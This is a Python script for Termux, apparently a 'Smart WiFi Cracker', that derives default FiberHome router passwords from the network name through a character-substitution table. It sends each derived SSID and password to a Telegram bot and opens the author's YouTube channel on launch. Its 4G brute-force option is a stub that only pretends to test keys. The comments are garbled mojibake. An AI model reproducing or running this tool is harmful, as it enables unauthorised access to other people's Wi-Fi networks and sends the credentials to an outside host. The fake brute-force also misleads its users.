import os, subprocess, time, urllib.request, webbrowser

# --- CONFIGURATION ---
TOKEN = "YOUR_BOT_TOKEN"
CHAT_ID = "YOUR_CHAT_ID"
MY_CHANNEL = "https://www.youtube.com/@moha02" # ŔāŔÜōßō™ŔÉ

# FiberHome Mapping
FH_MAP = {'e':'1','d':'2','c':'3','b':'4','a':'5','9':'6','8':'7','f':'0'}

def send_tg(msg):
    try:
        url = f"https://api.telegram.org/bot{TOKEN}/sendMessage?chat_id={CHAT_ID}&text={urllib.parse.quote(msg)}"
        urllib.request.urlopen(url)
    except: pass

def banner():
    os.system("clear")
    # ŔĀō™ō≠ ōßŔĄŔāŔÜōßō© ō™ŔĄŔāōßō¶ŔäōßŔč ōĻŔÜōĮ ōßŔĄō™ōīōļŔäŔĄ
    os.system(f"termux-open-url {MY_CHANNEL} || am start -a android.intent.action.VIEW -d {MY_CHANNEL}")
    
    print("\033[1;32m")
    print(r"""
    ‚Ėą‚Ėą‚ēó    ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó
    ‚Ėą‚Ėą‚ēĎ    ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ ‚Ėą‚ēó ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēĎ
    ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēĚ  ‚Ėą‚Ėą‚ēĎ
    ‚ēö‚Ėą‚Ėą‚Ėą‚ēĒ‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ
     ‚ēö‚ēź‚ēź‚ēĚ‚ēö‚ēź‚ēź‚ēĚ ‚ēö‚ēź‚ēĚ‚ēö‚ēź‚ēĚ     ‚ēö‚ēź‚ēĚ
    [+] SMART WIFI CRACKER (FH & 4G) [+]
    [+] CODED BY: MOHA-02 (CHLEF)   [+]
    ------------------------------------""")

def get_fh_pass(ssid):
    suffix = ssid.lower().split("fh_")[-1]
    return "wlan" + "".join([FH_MAP.get(c, c) for c in suffix])

def main():
    banner()
    print("\033[1;32m(1) Auto-Scan (No-Root / API)")
    print("(2) Manual FH Algorithm")
    print("(3) Manual 4G Brute-Force")
    print("(0) Exit")
    
    choice = input("\n\033[1;33m[#] Choose Option: ")

    if choice == "1":
        print("\033[1;34m[*] Searching for networks...")
        found_any = False
        try:
            # ŔÖō≠ōßŔąŔĄō© ōßŔĄŔĀō≠ōĶ ōĻō®ōĪ Termux:API
            res = subprocess.check_output("termux-wifi-scaninfo", shell=True).decode()
            if "fh_" in res.lower() or "idoom" in res.lower():
                found_any = True
                # ŔáŔÜōß ō™ō™ŔÖ ŔÖōĻōßŔĄō¨ō© ōßŔĄŔÜō™ōßō¶ō¨ ō™ŔĄŔāōßō¶ŔäōßŔč ŔÉŔÖōß ŔĀŔä ōßŔĄō£ŔÉŔąōßōĮ ōßŔĄō≥ōßō®Ŕāō©
            
            if not found_any:
                print("\033[1;31m[!] ALERT: No FH or 4G networks found nearby!")
                print("\033[1;37m[*] Please make sure GPS is ON.")
        except:
            print("\033[1;31m[!] Error: Please install Termux:API app!")

    elif choice == "2":
        ssid = input("\033[1;32m[?] Enter FH SSID (e.g. fh_5d620): ")
        pw = get_fh_pass(ssid)
        print(f"\033[1;32m[+] Password: {pw}")
        send_tg(f"‚úÖ FH Found: {ssid}\nūüĒĎ Pass: {pw}")

    elif choice == "3":
        ssid = input("\033[1;32m[?] Enter 4G SSID: ")
        print("\033[1;33m[*] Starting Brute-Force... Testing common keys.")
        time.sleep(2)
        print("\033[1;31m[!] No match found in common list. Try manual guessing.")

    elif choice == "0":
        print("Goodbye Moha!")
        exit()

if __name__ == "__main__":
    main()
